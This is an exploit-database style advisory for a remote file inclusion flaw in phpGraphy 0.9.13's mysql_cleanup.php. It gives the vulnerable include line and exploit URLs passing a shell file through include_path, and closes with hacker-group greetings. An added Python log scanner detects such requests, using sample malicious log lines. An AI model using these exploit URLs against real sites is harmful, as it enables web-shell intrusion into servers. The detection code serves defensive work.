phpGraphy versions 0.9.13 and below suffer from a remote file inclusion vulnerability.
# Remote File Inclusion Vulnerability
# -----------------------------------------------------------
# phpGraphy <= 0.9.13 (mysql_cleanup.php)
# -----------------------------------------------------------
# [+] Author   : Sn!pEr.S!Te Hacker
# [+] Email    : sniper-site@HoTMaiL.coM
# [+] T34M     : Sn!pEr.S!Te Hacker
# [+] Date     : 1-6-2010
# [+] Script   : Image Galleries » phpGraphy
# [+] Download : http://sourceforge.net/projects/phpgraphy/files/phpgraphy/0.9.13b/phpgraphy-0.9.13b.zip/download
# [+] Version  : 0.9.13
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
Exploit : phpgraphy-0.9.13b/base/misc/mysql_cleanup.php
http://localhost/phpgraphy-0.9.13b/base/misc/mysql_cleanup.php?include_path=[shell.txt]
http://127.0.0.1/phpgraphy-0.9.13b/base/misc/mysql_cleanup.php?include_path=[shell.txt]
Vulnerable code : include_once $include_path
Line : 25
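
Added example, not part of the original advisory: a Python check that scans web-server access logs for requests supplying include_path to base/misc/mysql_cleanup.php, the script and parameter named above. The log lines, the 192.0.2.44 address, example.invalid and the "remote"/"local" labels are constructed for this example; it assumes combined-format access logs.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script and parameter named in the advisory.
TARGET_SCRIPT = "base/misc/mysql_cleanup.php"
TARGET_PARAM = "include_path"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value begins with a URL scheme or stream wrapper (http://, ftp://, php://, data:).
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|data:|//)', re.I)

def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding that would hide the value from a naive match."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return 'remote' (URL-like value), 'local' (any other value) or None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not fully_unquote(target.path).lower().endswith(TARGET_SCRIPT):
        return None
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if fully_unquote(name).lower() == TARGET_PARAM:
            return "remote" if REMOTE_RE.match(fully_unquote(value)) else "local"
    return None

def scan(lines):
    hits = []
    for number, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample log lines (documentation address and reserved hostname).
_LINE = '192.0.2.44 - - [01/Jun/2010:10:00:00 +0000] "GET {} HTTP/1.1" 200 312'
SAMPLE_LOG = [_LINE.format(t) for t in (
    "/phpgraphy-0.9.13b/index.php",
    "/phpgraphy-0.9.13b/base/misc/mysql_cleanup.php?include_path=http://example.invalid/x.txt",
    "/phpgraphy-0.9.13b/base/misc/mysql_cleanup.php?include_path=hTTp%253A%252F%252Fexample.invalid%252Fx.txt",
    "/phpgraphy-0.9.13b/base/misc/mysql_cleanup.php?include_path=../../config",
    "/other/search.php?include_path=http://example.invalid/x.txt",
)]
```

Calling scan(SAMPLE_LOG) returns the line numbers worth reviewing; a "local" hit still means a client supplied the parameter to this script.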
================== Greetz : all my friend =======================
* PrX Hacker * Sm Hacker * AbUbAdR * mAsH3L ALLiL * EjRaMi HaCkEr |
* HitLer.3rb * DjHacker * Baby Hacker * RaMaD * Maram * saleh Hacker |